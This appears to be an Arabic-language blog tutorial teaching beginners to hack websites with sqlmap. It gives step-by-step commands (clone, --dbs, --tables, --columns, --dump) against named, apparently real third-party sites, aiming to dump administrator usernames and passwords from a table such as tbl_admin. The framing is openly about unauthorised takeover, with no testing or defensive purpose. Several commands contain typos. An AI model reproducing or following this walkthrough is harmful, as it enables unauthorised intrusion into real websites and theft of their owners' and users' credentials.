شرح اداة sqlmap لاختراق المواقع 🐍.
مصابة بثغرة sql]
طبعاً لو انت مخترق مواقع مبتدأ وتريد والبحث عن مواقع مصابة وثغراتها طبعاً هيكون ابتدائك اولا باختراق مواقع sql وده يعتبر اسهل ثغرات لاختراق المواقع لو كنت حابب اختراق مواقع وكشف ثغرات وتلك الاعمال وكنت مشغول بها جدا ستتمكن من ذلك بعد تعلم ثغرة sql وطريقة برمجتها واستخدامها واختراقها ايضاً والان سأشرح لكم بالتفصيل كيف يتم اختراق ملفات الموقع واستخراج اليوزر والباسورد لكي تستطيع ان تقوم باختراق الموقع
اولا سنقوم بتحميل الاداة sqlmap عبر كتابة امر
• git clone https://github.com/sqlmapproject/sqlm...
اولا ستقوم بجلب اي موقع مصاب وثم دخول الى مجلد sqlmap
عبر كتابة امر
• cd sqlmap
ثم نقوم بكتابة امر
• python2 sqlmap.py -u
https://tncgroup.pk/content.php?Id=3
- -dbs
طبعا بدلا من كلمة URL SITE تقوم باضافة رابط الموقع المصاب SQL
مثال
•python2 sqlmap.py -u http://www.artstatements.com/artist_d... --dbs
⚡♥⚡♥⚡♥⚡♥⚡♥⚡♥
طبعاً الان تم دخول الى ملفات الموقع اي اننا قمنا باختراق الموقع الان نكتب هذا الامر لكي ان تستطيع دخول الى ملف الاساسي للموقع
• python2 sqlmap.py -u http://www.selectservice.ca/m/content... --tables
طبعاً هتغير اسم Namefile بكتابة اسم الملف الخاص للموقع
ثم تظهر لك ملفات الموقع الاخرى مثل المقالات الموقع او الحسابات مسجلة في الموقع وبيانات الموظفين والحسابات و كلمات السر الموقع اليوزر النيم والباسورد
⚡♥⚡♥⚡♥⚡♥⚡♥⚡♥⚡♥
تترك كل ملفات لانك لن تحتاجها فقط قم بالبحث عن ملف خاص لبيانات دخول الموقع نقوم بكتابة امر
• python2 sqlmap.py -u http://www.selectservice.ca/m/content... --D staff -T user site --columuns
طبعا بدلا من اسم NAMESITE تقوم بكتابة اسم ملف الخاص للموقع الذي يحتوي على اليوزر والباسورد وعادة تكون اسمها
user site , password , user
وهكذا شبيهة لتلك الاسماء على سبيل مثال ساقوم بفتح ملف اسمها
user_name & password
-----
هكتب الامر اللي جاي لسحب كلمات المرور واليوزر للموقع
• python2 sqlmap.py -u -u https://tncgroup.pk/content.php?Id=3 --D tncgroup_webx -T tbl_admin --C pname,ppass --dump
وبعد كتابة الامر هيظهرلك اليوزر والباسوردات الخاص بالموقع انت فقط يمكنك تغيير اسم ملفات الذي تريده ويمكنك من خلال اليوزر والباسورد اختراق الموقع بكل سهولة
@mafia_7x : المصدر
تعليقات
إرسال تعليق